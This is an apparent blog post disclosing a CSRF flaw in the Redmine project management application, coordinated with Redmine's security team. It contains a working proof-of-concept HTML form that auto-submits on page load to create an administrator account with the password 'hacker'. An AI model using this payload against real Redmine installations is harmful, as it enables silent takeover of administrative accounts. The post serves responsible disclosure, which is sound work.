Redmine, a flexible project management web application, which is used by many companies, including company, where I work, till this day was vulnerable to CSRF from task updating to administration. So, the easiest and the most critical PoC I could code was the one that creates user with administrative rights.
I've contacted Redmine's SecTeam and they rapidly released new version and separate patch (they are cool team, actually). Those, who use it, need to update asap, because this vulnerability is a critical one.
<form method=POST action="http://www.site.org/users/new"> <input type="text" value="hacker" size="25" name="user[login]" id="user_login"/> <input type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/> <input type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/> <input type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/> <input type="password" size="25" name="password" id="password" value="hacker" /> <input type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" /> <input type="checkbox" value="1" name="user[admin]" id="user_admin"/> <input type="hidden" value="1" name="user[admin]"/> <input type="submit" value="Create" id="commit" name="commit" /> </form> <script>document.getElementById("commit").click();</script>
Exploit is here
EDIT: It seems that Redmine was not fixed in new version :) Maybe there were some problems with my local version, but token was generated one time and for all users. I've reached them, so gotta be fixed finally.
2 comments:
Thanks again for contacting the security team through the proper channels so we could fix this. Let us know if you notice any other bugs, security or application.
@theadmin
you're welcome :)
Post a Comment